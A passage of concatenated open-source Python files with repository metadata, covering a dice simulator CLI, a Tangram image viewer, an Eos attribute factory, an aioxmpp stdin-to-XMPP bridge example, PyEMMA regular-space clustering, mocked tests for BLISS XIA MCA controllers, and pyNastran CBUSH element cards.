"none": keep_none,
"value": keep_value,
"unique": keep_unique,
"duplicate": keep_duplicates,
}
def parse_arg_keep_function(args):
"""Parse command-line arguments for the keep strategy."""
if args is None or len(args) == 0:
args = ["none"]
if args[0] in KEEP_ARG_OPTIONS:
func = KEEP_ARG_OPTIONS[args[0]]
else:
raise Exception("'--keep' parameter has to specify a valid keep strategy, " +
" not '{}'. Valid options are: {}".format(args[0], KEEP_ARG_OPTIONS.keys()))
keep_args = []
for arg in args[1:]:
keep_args.append(int(arg))
return func, keep_args
def parse_args():
"""Parse command-line arguments."""
parser = argparse.ArgumentParser(
description="Simulate various dice throw situations.", add_help=False,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("-h", "--help", action="help", help="Show this help message and exit.")
parser.add_argument('--version', action='version',
version='%(prog)s, version {}\nSimon Muller <samullers@gmail.com>'.format(__version__))
parser.add_argument("-n", dest="num", type=int, default=1,
help="Specify the number of dice to throw.")
parser.add_argument("-s", dest="sides", type=int, default=6,
help="Specify the number of sides all dice have.")
parser.add_argument("-ss", dest="multi_sides", type=int, nargs="*", metavar="SIDES",
help="Specify the number of sides for each individual die.")
parser.add_argument("-r", dest="reroll", type=int, default=1,
help="Perform multiple rerolls (stats only count last roll).")
parser.add_argument("--keep", nargs="*", metavar="STRATEGY",
help="Choose a keeping strategy when performing rerolls. Options are: {}."
.format(KEEP_ARG_OPTIONS.keys(),))
parser.add_argument("--stats", nargs="*", metavar="REDUCE",
help="Performs multiple throws and outputs cumulative results. " +
"Provide a parameter to choose an approach for reducing a " +
"dice throw to a single value of interest. Options are: %s." %
(REDUCE_ARG_OPTIONS.keys(),))
parser.add_argument("-N", type=int, default=1000, metavar="SIMULATIONS",
help="Set the number of simulations to run for statistical results.", )
parser.add_argument("--counts", default=False, action="store_true",
help="Print actual event counts instead of percentages in the statistical results.", )
parser.add_argument("--seed", type=int,
# "Set the seed value used for randomizing results."
help=argparse.SUPPRESS)
args = parser.parse_args()
if args.multi_sides is not None:
if len(args.multi_sides) != args.num:
raise Exception("'-ss' parameter has to specify the same number of values as there are dice.")
args.sides = args.multi_sides
args.keep = parse_arg_keep_function(args.keep)
if args.stats is not None:
args.stats = parse_arg_reduce_function(args.stats)
if args.seed is not None:
random.seed(args.seed)
return args
def main():
settings = parse_args()
def keep_strategy(outcome):
return settings.keep[0](
outcome,
settings.keep[1] if len(settings.keep) > 1 else None
)
def reduce_func(outcome):
return settings.stats[0](
outcome,
settings.stats[1] if len(settings.stats) > 1 else None
)
if settings.stats is not None:
# Perform multiple simulations and output statistical results
def perform_roll():
return reduce_func(
reroll_dice_with_choice_last_only(
keep_strategy=keep_strategy,
rerolls=settings.reroll,
num=settings.num,
sides=settings.sides),
)
print("{}:".format(settings.stats[2].capitalize()))
run_multiple_times_and_print_stats(perform_roll,
N=settings.N,
use_percentages=not settings.counts)
else:
# Perform a single simulation and output results
results = reroll_dice_with_choice(
keep_strategy=keep_strategy,
rerolls=settings.reroll,
num=settings.num,
sides=settings.sides)
for result in results:
print(result)
if __name__ == "__main__":
main()
|
samuller/dice
|
dice.py
|
Python
|
lgpl-2.1
| 12,835
|
# Copyright 2017-2018 The Tangram Developers. See the AUTHORS file at the
# top-level directory of this distribution and at
# https://github.com/renatoGarcia/tangram/blob/master/AUTHORS.
#
# This file is part of Tangram.
#
# Tangram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Tangram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Tangram in the COPYING and COPYING.LESSER files.
# If not, see <http://www.gnu.org/licenses/>.
from typing import Union, Mapping, Iterable, Tuple, Any
import numpy as np
from ..pixmap import Pixmap
from ..widget import ImageViewer, MainWindow, Notebook
from ..input_states import Key, Modifier
class _Dispatcher:
def __init__(self, objs: Iterable[Tuple[Any, str]]) -> None:
self._objs: Iterable[Tuple[Any, str]] = objs
def __call__(self, *args, **kwargs):
for obj, name in self._objs:
getattr(obj, name)(*args, **kwargs)
def __iadd__(self, value) -> None:
for obj, name in self._objs:
v = getattr(obj, name)
v += value
setattr(obj, name, v)
return self
def __isub__(self, value) -> None:
for obj, name in self._objs:
v = getattr(obj, name)
v -= value
setattr(obj, name, v)
return self
class _Broadcaster:
def __init__(self, viewers: Notebook) -> None:
self._viewers: Notebook = viewers
def __getattr__(self, name):
return _Dispatcher((viewer, name) for viewer in self._viewers.values())
def __setattr__(self, name, value):
if name == '_viewers':
object.__setattr__(self, name, value)
elif not isinstance(value, _Dispatcher):
for viewer in self._viewers.values():
setattr(viewer, name, value)
class _Switcher:
def __init__(self, viewers: Notebook) -> None:
self._viewers: Notebook = viewers
def __getattr__(self, name):
return _Dispatcher([(self._viewers.current_child, name)])
def __setattr__(self, name, value):
if name == '_viewers':
object.__setattr__(self, name, value)
elif not isinstance(value, _Dispatcher):
viewer = self._viewers.current_child
setattr(viewer, name, value)
def _on_key_press(notebook: Notebook,
broadcaster: _Broadcaster,
switcher: _Switcher,
key: Key,
modifiers: Modifier) -> None:
if key is Key.underscore:
if Modifier.Control in modifiers:
broadcaster.fit_image()
else:
switcher.fit_image()
elif key is Key.minus:
if Modifier.Control in modifiers:
broadcaster.zoom_out()
else:
switcher.zoom_out()
elif key is Key.plus:
if Modifier.Control in modifiers:
broadcaster.zoom_in()
else:
switcher.zoom_in()
elif key is Key.equal:
if Modifier.Control in modifiers:
broadcaster.zoom = 1.0
else:
switcher.zoom = 1.0
elif key in [Key.Tab, key.ISO_Left_Tab] and Modifier.Control in modifiers:
if Modifier.Shift in modifiers:
notebook.prev_page()
else:
notebook.next_page()
elif key is Key.J:
notebook.prev_page()
elif key is Key.K:
notebook.next_page()
elif key is Key.j:
if Modifier.Mod1 in modifiers:
switcher.v_offset += 1
else:
switcher.v_offset += 20
elif key is Key.k:
if Modifier.Mod1 in modifiers:
switcher.v_offset -= 1
else:
switcher.v_offset -= 20
elif key is Key.h:
if Modifier.Mod1 in modifiers:
switcher.h_offset -= 1
else:
switcher.h_offset -= 20
elif key is Key.l:
if Modifier.Mod1 in modifiers:
switcher.h_offset += 1
else:
switcher.h_offset += 20
def imshow(image: Union[np.ndarray, Mapping[str, np.ndarray], Iterable[np.ndarray]]) -> None:
if isinstance(image, np.ndarray):
notebook = Notebook({'': ImageViewer(Pixmap(image))}, tabs_are_visible=False),
elif isinstance(image, Mapping):
notebook = Notebook({name: ImageViewer(Pixmap(img)) for name, img in image.items()})
else:
notebook = Notebook({str(idx): ImageViewer(Pixmap(img))
for idx, img in enumerate(image, start=1)})
broadcaster = _Broadcaster(notebook)
switcher = _Switcher(notebook)
mw = MainWindow(title="Tangram", widget=notebook)
mw.key_press.add_callback(lambda key, modifier:
_on_key_press(notebook, broadcaster, switcher, key, modifier))
mw.show()
mw.destroy.wait()
|
renatoGarcia/tangram
|
tangram/recipes/imshow.py
|
Python
|
lgpl-3.0
| 5,231
|
# ==============================================================================
# Copyright (C) 2011 Diego Duclos
# Copyright (C) 2011-2018 Anton Vorobyov
#
# This file is part of Eos.
#
# Eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Eos. If not, see <http://www.gnu.org/licenses/>.
# ==============================================================================
from .attribute import Attribute
class AttrFactory:
"""Produces attributes."""
@classmethod
def make(cls, *args, **kwargs):
"""Produce an attribute.
Args:
*args: Arguments to pass to the attribute constructor.
**kwargs: Keyword arguments to pass to the attribute constructor.
Returns:
Attribute instance.
"""
attr = Attribute(*args, **kwargs)
return attr
|
pyfa-org/eos
|
eos/eve_obj/attribute/factory.py
|
Python
|
lgpl-3.0
| 1,354
|
#!/usr/bin/env python3
########################################################################
# File name: xmpp_bridge.py
# This file is part of: aioxmpp
#
# LICENSE
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
########################################################################
import asyncio
import asyncio.streams
import os
import signal
import sys
import aioxmpp
async def stdout_writer():
"""
This is a bit complex, as stdout can be a pipe or a file.
If it is a file, we cannot use
:meth:`asycnio.BaseEventLoop.connect_write_pipe`.
"""
if sys.stdout.seekable():
# it’s a file
return sys.stdout.buffer.raw
if os.isatty(sys.stdin.fileno()):
# it’s a tty, use fd 0
fd_to_use = 0
else:
fd_to_use = 1
twrite, pwrite = await loop.connect_write_pipe(
asyncio.streams.FlowControlMixin,
os.fdopen(fd_to_use, "wb"),
)
swrite = asyncio.StreamWriter(
twrite,
pwrite,
None,
loop,
)
return swrite
async def main(local, password, peer,
strip_newlines, add_newlines):
loop = asyncio.get_event_loop()
swrite = await stdout_writer()
sread = asyncio.StreamReader()
tread, pread = await loop.connect_read_pipe(
lambda: asyncio.StreamReaderProtocol(sread),
sys.stdin,
)
client = aioxmpp.Client(
local,
aioxmpp.make_security_layer(
password,
)
)
sigint = asyncio.Event()
loop.add_signal_handler(signal.SIGINT, sigint.set)
loop.add_signal_handler(signal.SIGTERM, sigint.set)
def recv(message):
body = message.body.lookup(
[aioxmpp.structs.LanguageRange.fromstr("*")]
)
if add_newlines:
body += "\n"
swrite.write(body.encode("utf-8"))
client.stream.register_message_callback(
"chat",
peer,
recv
)
sigint_future = asyncio.ensure_future(sigint.wait())
read_future = asyncio.ensure_future(sread.readline())
try:
async with client.connected() as stream:
# we send directed presence to the peer
pres = aioxmpp.Presence(
type_=aioxmpp.PresenceType.AVAILABLE,
to=peer,
)
await stream.send(pres)
while True:
done, pending = await asyncio.wait(
[
sigint_future,
read_future,
],
return_when=asyncio.FIRST_COMPLETED,
)
if sigint_future in done:
break
if read_future in done:
line = read_future.result().decode()
if not line:
break
if strip_newlines:
line = line.rstrip()
msg = aioxmpp.Message(
type_="chat",
to=peer,
)
msg.body[None] = line
await stream.send(msg)
read_future = asyncio.ensure_future(
sread.readline()
)
finally:
sigint_future.cancel()
read_future.cancel()
def jid(s):
return aioxmpp.JID.fromstr(s)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description="""
Send lines from stdin to the given peer and print messages received
from the peer to stdout.""",
epilog="""
The password must be set in the XMPP_BRIDGE_PASSWORD environment
variable."""
)
parser.add_argument(
"--no-strip-newlines",
dest="strip_newlines",
action="store_false",
default=True,
help="Disable stripping newlines from stdin"
)
parser.add_argument(
"--no-add-newlines",
dest="add_newlines",
action="store_false",
default=True,
help="Disable adding newlines to stdout"
)
parser.add_argument(
"local",
help="JID to bind to",
type=jid,
)
parser.add_argument(
"peer",
help="JID of the peer to send messages to",
type=jid,
)
args = parser.parse_args()
try:
password = os.environ["XMPP_BRIDGE_PASSWORD"]
except KeyError:
parser.print_help()
print("XMPP_BRIDGE_PASSWORD is not set", file=sys.stderr)
sys.exit(1)
loop = asyncio.get_event_loop()
loop.run_until_complete(main(
args.local, password, args.peer,
args.strip_newlines,
args.add_newlines,
))
loop.close()
|
horazont/aioxmpp
|
examples/xmpp_bridge.py
|
Python
|
lgpl-3.0
| 5,377
|
# This file is part of PyEMMA.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# PyEMMA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on 26.01.2015
@author: marscher
'''
from __future__ import absolute_import
import warnings
from pyemma.coordinates.clustering import regspatial
from pyemma.coordinates.clustering.interface import AbstractClustering
from pyemma.util.annotators import doc_inherit
from pyemma.util.exceptions import NotConvergedWarning
import numpy as np
__all__ = ['RegularSpaceClustering']
class RegularSpaceClustering(AbstractClustering):
r"""Regular space clustering"""
def __init__(self, dmin, max_centers=1000, metric='euclidean', stride=1, n_jobs=None):
"""Clusters data objects in such a way, that cluster centers are at least in
distance of dmin to each other according to the given metric.
The assignment of data objects to cluster centers is performed by
Voronoi partioning.
Regular space clustering [Prinz_2011]_ is very similar to Hartigan's leader
algorithm [Hartigan_1975]_. It consists of two passes through
the data. Initially, the first data point is added to the list of centers.
For every subsequent data point, if it has a greater distance than dmin from
every center, it also becomes a center. In the second pass, a Voronoi
discretization with the computed centers is used to partition the data.
Parameters
----------
dmin : float
minimum distance between all clusters.
metric : str
metric to use during clustering ('euclidean', 'minRMSD')
max_centers : int
if this cutoff is hit during finding the centers,
the algorithm will abort.
n_jobs : int or None, default None
Number of threads to use during assignment of the data.
If None, all available CPUs will be used.
References
----------
.. [Prinz_2011] Prinz J-H, Wu H, Sarich M, Keller B, Senne M, Held M, Chodera JD, Schuette Ch and Noe F. 2011.
Markov models of molecular kinetics: Generation and Validation.
J. Chem. Phys. 134, 174105.
.. [Hartigan_1975] Hartigan J. Clustering algorithms.
New York: Wiley; 1975.
"""
super(RegularSpaceClustering, self).__init__(metric=metric, n_jobs=n_jobs)
self.set_params(dmin=dmin, metric=metric, max_centers=max_centers, stride=stride)
@doc_inherit
def describe(self):
return "[RegularSpaceClustering dmin=%f, inp_dim=%i]" % (self._dmin, self.data_producer.dimension())
@property
def dmin(self):
"""Minimum distance between cluster centers."""
return self._dmin
@dmin.setter
def dmin(self, d):
if d < 0:
raise ValueError("d has to be positive")
self._dmin = float(d)
self._estimated = False
@property
def max_centers(self):
"""
Cutoff during clustering. If reached no more data is taken into account.
You might then consider a larger value or a larger dmin value.
"""
return self._max_centers
@max_centers.setter
def max_centers(self, value):
if value < 0:
raise ValueError("max_centers has to be positive")
self._max_centers = int(value)
self._estimated = False
@property
def n_clusters(self):
return self.max_centers
@n_clusters.setter
def n_clusters(self, val):
self.max_centers = val
def _estimate(self, iterable, **kwargs):
########
# Calculate clustercenters:
# 1. choose first datapoint as centroid
# 2. for all X: calc distances to all clustercenters
# 3. add new centroid, if min(distance to all other clustercenters) >= dmin
########
# temporary list to store cluster centers
clustercenters = []
it = iterable.iterator(return_trajindex=False)
used_frames = 0
try:
with iterable.iterator(return_trajindex=False, stride=self.stride, chunk=self.chunksize) as it:
for X in it:
used_frames += len(X)
regspatial.cluster(X.astype(np.float32, order='C', copy=False),
clustercenters, self.dmin,
self.metric, self.max_centers)
except RuntimeError:
msg = 'Maximum number of cluster centers reached.' \
' Consider increasing max_centers or choose' \
' a larger minimum distance, dmin.'
self._logger.warning(msg)
warnings.warn(msg)
# finished anyway, because we have no more space for clusters. Rest of trajectory has no effect
clustercenters = np.array(clustercenters)
self.update_model_params(clustercenters=clustercenters,
n_cluster=len(clustercenters))
# pass amount of processed data
used_data = used_frames / float(it.n_frames_total()) * 100.0
raise NotConvergedWarning("Used data for centers: %.2f%%" % used_data)
clustercenters = np.array(clustercenters)
self.update_model_params(clustercenters=clustercenters,
n_clusters=len(clustercenters))
if len(clustercenters) == 1:
self._logger.warning('Have found only one center according to '
'minimum distance requirement of %f' % self.dmin)
return self
|
gph82/PyEMMA
|
pyemma/coordinates/clustering/regspace.py
|
Python
|
lgpl-3.0
| 6,265
|
"""Test module for the XIA MCAs."""
import pytest
from bliss.controllers.mca import Brand, DetectorType, Stats
from bliss.controllers.mca import PresetMode, TriggerMode
from bliss.controllers.mca import XIA, XMAP
@pytest.fixture(
params=['xia', 'mercury', 'xmap', 'falconx'])
def xia(request, beacon, mocker):
beacon.reload()
# Mocking
m = mocker.patch('zerorpc.Client')
client = m.return_value
# Modules
client.get_detectors.return_value = ['detector1']
client.get_modules.return_value = ['module1']
# Elements
client.get_channels.return_value = (0, 1, 2, 3)
# Configuration
client.get_config_files.return_value = ['some_config.ini']
client.get_config.return_value = {'my': 'config'}
mtype = 'mercury' if request.param == 'xia' else request.param
client.get_module_type.return_value = mtype
# Emulate running behavior
client.is_running.return_value = True
def mock_not_running():
client.is_running.return_value = False
client.mock_not_running = mock_not_running
# Instantiating the xia
xia = beacon.get(request.param + '1')
assert xia._proxy is client
m.assert_called_once_with(xia._config['url'])
yield xia
def test_xia_instanciation(xia):
client = xia._proxy
config_dir = xia._config['configuration_directory']
default = xia._config['default_configuration']
client.init.assert_called_once_with(config_dir, default)
assert xia.current_configuration == default
assert xia.configured
def test_xia_infos(xia):
assert xia.detector_brand == Brand.XIA
if type(xia) is XIA:
assert xia.detector_type == DetectorType.MERCURY
else:
name = type(xia).__name__.upper()
assert xia.detector_type == getattr(DetectorType, name)
assert xia.elements == (0, 1, 2, 3)
def test_xia_configuration(xia):
client = xia._proxy
config_dir = xia._config['configuration_directory']
default = xia._config['default_configuration']
assert xia.available_configurations == ['some_config.ini']
client.get_config_files.assert_called_once_with(config_dir)
assert xia.current_configuration_values == {'my': 'config'}
client.get_config.assert_called_once_with(config_dir, default)
def test_xia_preset_mode(xia):
client = xia._proxy
# First test
xia.set_preset_mode(None)
assert client.set_acquisition_value.call_args_list == \
[(('preset_type', 0),), (('preset_value', 0),)]
client.apply_acquisition_values.assert_called_once_with()
# Error tests
with pytest.raises(ValueError):
xia.set_preset_mode(3)
with pytest.raises(TypeError):
xia.set_preset_mode(PresetMode.NONE, 1)
with pytest.raises(TypeError):
xia.set_preset_mode(PresetMode.REALTIME, None)
def test_xia_trigger_mode(xia):
client = xia._proxy
# XMAP specific tests
xmap = isinstance(xia, XMAP)
if xmap:
client.get_trigger_channels.return_value = [0]
xmap_prefix = [(('gate_master', True, 0),)]
else:
xmap_prefix = []
# First test
xia.set_trigger_mode(None)
assert client.set_acquisition_value.call_args_list == [
(('gate_ignore', 1),),
(('mapping_mode', 0),)]
client.apply_acquisition_values.assert_called_once_with()
# Second test
client.set_acquisition_value.reset_mock()
client.apply_acquisition_values.reset_mock()
xia.set_trigger_mode(TriggerMode.GATE)
assert client.set_acquisition_value.call_args_list == xmap_prefix + [
(('gate_ignore', 0),),
(('mapping_mode', 1),),
(('pixel_advance_mode', 1),)]
client.apply_acquisition_values.assert_called_once_with()
# Third test
client.set_acquisition_value.reset_mock()
client.apply_acquisition_values.reset_mock()
client.get_acquisition_value.return_value = 3 # Multiple
xia.set_trigger_mode(TriggerMode.SYNC)
assert client.set_acquisition_value.call_args_list == xmap_prefix + [
(('gate_ignore', 1),),
(('mapping_mode', 1),),
(('pixel_advance_mode', 1),)]
client.apply_acquisition_values.assert_called_once_with()
# Error tests
with pytest.raises(ValueError):
xia.set_trigger_mode(13)
# XMAP specific
if xmap:
client.get_trigger_channels.return_value = []
with pytest.raises(ValueError):
xia.set_trigger_mode(TriggerMode.GATE)
# XMAP specific
if xmap:
client.get_trigger_channels.return_value = [0]
with pytest.raises(ValueError):
xia.set_trigger_mode(TriggerMode.GATE, channel=1)
def test_xia_hardware_points(xia):
client = xia._proxy
# Test single setter
client.get_acquisition_value.return_value = 1.
xia.set_hardware_points(3)
client.set_acquisition_value.assert_called_once_with('num_map_pixels', 3)
client.apply_acquisition_values.assert_called_once_with()
# Test single getter
values = [1., 3.]
client.get_acquisition_value.reset_mock()
client.get_acquisition_value.side_effect = lambda *args: values.pop(0)
assert xia.hardware_points == 3
assert client.get_acquisition_value.call_args_list == [
(('mapping_mode',),),
(('num_map_pixels',),)]
# Error tests
with pytest.raises(ValueError):
xia.set_hardware_points(0)
def test_xia_block_size(xia):
client = xia._proxy
# Test simple setter
assert xia.set_block_size(3) is None
client.set_acquisition_value.assert_called_once_with(
'num_map_pixels_per_buffer', 3)
client.apply_acquisition_values.assert_called_once_with()
# Test simple getter
client.get_acquisition_value.reset_mock()
client.get_acquisition_value.return_value = 3
xia.block_size == 3
assert client.get_acquisition_value.call_args_list == [
(('mapping_mode',),),
(('num_map_pixels_per_buffer',),)]
# Test default setter
client.apply_acquisition_values.reset_mock()
assert xia.set_block_size() is None
client.set_maximum_pixels_per_buffer.assert_called_once_with()
client.apply_acquisition_values.assert_called_once_with()
def test_xia_software_acquisition(xia, mocker):
client = xia._proxy
sleep = mocker.patch('gevent.sleep')
sleep.side_effect = lambda x: client.mock_not_running()
client.get_spectrums.return_value = {0: [3, 2, 1]}
client.get_statistics.return_value = {0: range(7)}
stats = Stats(*range(7))
assert xia.run_software_acquisition(1, 3.) == (
[{0: [3, 2, 1]}],
[{0: stats}])
def test_xia_multiple_acquisition(xia, mocker):
client = xia._proxy
client.get_spectrums.return_value = {0: [3, 2, 1]}
client.get_statistics.return_value = {0: range(9)}
client.synchronized_poll_data.side_effect = lambda: data.pop(0)
data = [(1, {0: {0: 'discarded'}}, {0: {0: [0]*7}}),
(2, {1: {0: 'spectrum0'}}, {1: {0: range(7)}}),
(3, {2: {0: 'spectrum1'}}, {2: {0: range(10, 17)}})]
stats0, stats1 = Stats(*range(7)), Stats(*range(10, 17))
data, stats = xia.run_synchronized_acquisition(2)
assert data == [{0: 'spectrum0'}, {0: 'spectrum1'}]
assert stats == [{0: stats0}, {0: stats1}]
def test_xia_configuration_error(xia):
client = xia._proxy
client.init.side_effect = IOError('File not found!')
with pytest.raises(IOError):
xia.load_configuration('i-dont-exist')
assert not xia.configured
assert xia.current_configuration is None
assert xia.current_configuration_values is None
def test_xia_finalization(xia):
client = xia._proxy
xia.finalize()
client.close.assert_called_once_with()
@pytest.mark.parametrize(
'dtype',
['xia', 'mercury', 'xmap', 'falconx'])
def test_xia_from_wrong_beacon_config(dtype, beacon, mocker):
# ZeroRPC error
beacon.reload()
m = mocker.patch('zerorpc.Client')
m.side_effect = IOError('Cannot connect!')
with pytest.raises(IOError):
beacon.get(dtype + '1')
# Handel error
m = mocker.patch('zerorpc.Client')
client = m.return_value
client.init.side_effect = IOError('File not found!')
with pytest.raises(IOError):
beacon.get(dtype + '1')
|
tiagocoutinho/bliss
|
tests/mca/test_xia.py
|
Python
|
lgpl-3.0
| 8,209
|
# pylint: disable=C0103,R0902,R0904,R0914,C0111
"""
All bush elements are defined in this file. This includes:
* CBUSH
* CBUSH1D
* CBUSH2D
All bush elements are BushElement and Element objects.
"""
from __future__ import (nested_scopes, generators, division, absolute_import,
print_function, unicode_literals)
from pyNastran.utils import integer_types
from pyNastran.bdf.field_writer_8 import set_blank_if_default
from pyNastran.bdf.cards.base_card import Element
from pyNastran.bdf.bdf_interface.assign_type import (
integer, integer_or_blank, integer_double_or_blank, double_or_blank,
string_or_blank)
from pyNastran.bdf.field_writer_8 import print_card_8
class BushElement(Element):
def __init__(self):
self.cid = None
Element.__init__(self)
def Cid(self):
if self.cid is None:
return None
elif isinstance(self.cid, integer_types):
return self.cid
return self.cid_ref.cid
def Mass(self):
return 0.
def get_edge_ids(self):
"""
Return the edge IDs
"""
return [tuple(sorted(self.node_ids))]
class CBUSH(BushElement):
type = 'CBUSH'
_field_map = {
1: 'eid', 2:'pid', 3:'ga', 4:'gb', 8:'cid', 9:'s', 10:'ocid'
}
def _update_field_helper(self, n, value):
if n == 11:
self.si[0] = value
elif n == 12:
self.si[1] = value
elif n == 13:
self.si[2] = value
else:
if self.g0 is not None:
if n == 5:
self.g0 = value
else:
raise KeyError('Field %r=%r is an invalid %s entry.' % (n, value, self.type))
else:
if n == 5:
self.x[0] = value
elif n == 6:
self.x[1] = value
elif n == 7:
self.x[2] = value
else:
raise KeyError('Field %r=%r is an invalid %s entry.' % (n, value, self.type))
def __init__(self, eid, pid, ga, gb, x, g0, cid, s, ocid, si, comment=''):
BushElement.__init__(self)
if comment:
self.comment = comment
self.eid = eid
self.pid = pid
self.ga = ga
self.gb = gb
self.x = x
self.g0 = g0
self.cid = cid
self.s = s
self.ocid = ocid
self.si = si
@classmethod
def add_card(cls, card, comment=''):
eid = integer(card, 1, 'eid')
pid = integer_or_blank(card, 2, 'pid', eid)
ga = integer(card, 3, 'ga')
gb = integer_or_blank(card, 4, 'gb')
x1_g0 = integer_double_or_blank(card, 5, 'x1_g0')
if isinstance(x1_g0, integer_types):
g0 = x1_g0
x = None
elif isinstance(x1_g0, float):
g0 = None
x1 = x1_g0
x2 = double_or_blank(card, 6, 'x2', 0.0)
x3 = double_or_blank(card, 7, 'x3', 0.0)
x = [x1, x2, x3]
assert max(x) != min(x), 'x=%s' % x
else:
g0 = None
x = [None, None, None]
#: Element coordinate system identification. A 0 means the basic
#: coordinate system. If CID is blank, then the element coordinate
#: system is determined from GO or Xi.
#: (default=blank=element-based)
cid = integer_or_blank(card, 8, 'cid')
#: Location of spring damper (0 <= s <= 1.0)
s = double_or_blank(card, 9, 's', 0.5)
#: Coordinate system identification of spring-damper offset. See
#: Remark 9. (Integer > -1; Default = -1, which means the offset
#: point lies on the line between GA and GB
ocid = integer_or_blank(card, 10, 'ocid', -1)
#: Components of spring-damper offset in the OCID coordinate system
#: if OCID > 0.
si = [double_or_blank(card, 11, 's1'),
double_or_blank(card, 12, 's2'),
double_or_blank(card, 13, 's3')]
assert len(card) <= 14, 'len(CBUSH card) = %i\ncard=%s' % (len(card), card)
return CBUSH(eid, pid, ga, gb, x, g0, cid, s, ocid, si, comment=comment)
@classmethod
def add_op2_data(cls, data, f, comment=''):
((eid, pid, ga, gb, cid, s, ocid, si), x, g0) = data
return CBUSH(eid, pid, ga, gb, x, g0, cid, s, ocid, si, comment=comment)
#def nodeIDs(self):
#self.deprecated('self.nodeIDs()', 'self.node_ids', '0.8')
#return self.node_ids
@property
def nodes(self):
return [self.ga, self.gb]
@property
def node_ids(self):
return [self.Ga(), self.Gb()]
def _verify(self, xref=False):
ga = self.Ga()
gb = self.Gb()
cid = self.Cid()
ocid = self.OCid()
pid = self.Pid()
#si = self.si
assert isinstance(ga, integer_types), 'ga=%r' % ga
assert isinstance(gb, integer_types) or gb is None, 'gb=%r' % gb
assert isinstance(pid, integer_types), 'pid=%r' % pid
assert isinstance(cid, integer_types) or cid is None, 'cid=%r' % cid
assert isinstance(ocid, integer_types), 'ocid=%r' % ocid
def Ga(self):
if isinstance(self.ga, integer_types):
return self.ga
return self.ga_ref.nid
def Gb(self):
if isinstance(self.gb, integer_types) or self.gb is None:
return self.gb
return self.gb_ref.nid
def OCid(self):
if self.ocid is None:
return None
elif isinstance(self.ocid, integer_types):
return self.ocid
return self.ocid_ref.cid
def Cid(self):
if self.cid is None:
return None
elif isinstance(self.cid, integer_types):
return self.cid
return self.cid_ref.cid
def cross_reference(self, model):
"""
Cross links the card so referenced cards can be extracted directly
Parameters
----------
model : BDF()
the BDF object
"""
msg = ' which is required by CBUSH eid=%s' % self.eid
self.ga = model.Node(self.ga, msg=msg)
self.ga_ref = self.ga
if self.gb is not None:
self.gb = model.Node(self.gb, msg=msg)
self.gb_ref = self.gb
self.pid = model.Property(self.pid, msg=msg)
self.pid_ref = self.pid
if self.cid is not None:
self.cid = model.Coord(self.cid, msg=msg)
self.cid_ref = self.cid
def uncross_reference(self):
self.ga = self.Ga()
self.gb = self.Gb()
self.pid = self.Pid()
self.cid = self.Cid()
if self.cid is not None:
del self.cid_ref
del self.ga_ref, self.gb_ref, self.pid_ref
def raw_fields(self):
if self.g0 is not None:
x = [self.g0, None, None]
else:
x = self.x
list_fields = (['CBUSH', self.eid, self.Pid(), self.Ga(), self.Gb()] + x +
[self.Cid(), self.s, self.ocid] + self.si)
return list_fields
def repr_fields(self):
if self.g0 is not None:
x = [self.g0, None, None]
else:
x = self.x
ocid = set_blank_if_default(self.OCid(), -1)
s = set_blank_if_default(self.s, 0.5)
list_fields = (['CBUSH', self.eid, self.Pid(), self.Ga(), self.Gb()] +
x + [self.Cid(), s, ocid] + self.si)
return list_fields
def write_card(self, size=8, is_double=False):
card = self.repr_fields()
return self.comment + print_card_8(card)
class CBUSH1D(BushElement):
type = 'CBUSH1D'
_field_map = {
1: 'eid', 2:'pid', 3:'ga', 4:'gb', 5:'cid',
}
def __init__(self, eid, pid, ga, gb, cid, comment=''):
if comment:
self.comment = comment
BushElement.__init__(self)
self.eid = eid
self.pid = pid
self.ga = ga
self.gb = gb
self.cid = cid
@classmethod
def add_card(cls, card, comment=''):
eid = integer(card, 1, 'eid')
pid = integer_or_blank(card, 2, 'pid', eid)
ga = integer(card, 3, 'ga')
gb = integer_or_blank(card, 4, 'gb')
cid = integer_or_blank(card, 5, 'cid')
assert len(card) <= 6, 'len(CBUSH1D card) = %i\ncard=%s' % (len(card), card)
return CBUSH1D(eid, pid, ga, gb, cid, comment=comment)
#@classmethod
#def add_op2_data(cls, data, comment=''):
#eid = data[0]
#pid = data[1]
#ga = data[2]
#gb = data[3]
#raise NotImplementedError(data)
#return CBUSH1D(eid, pid, ga, gb, cid, comment=comment)
def cross_reference(self, model):
"""
Cross links the card so referenced cards can be extracted directly
Parameters
----------
model : BDF()
the BDF object
"""
msg = ' which is required by CBUSH1D eid=%s' % self.eid
self.ga = model.Node(self.ga, msg=msg)
self.ga_ref = self.ga
if self.gb:
self.gb = model.Node(self.gb, msg=msg)
self.gb_ref = self.gb
self.pid = model.Property(self.pid, msg=msg)
